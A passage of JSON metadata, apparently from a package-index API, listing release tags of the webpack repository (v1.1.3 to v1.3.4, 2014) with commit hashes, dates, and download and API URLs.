https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3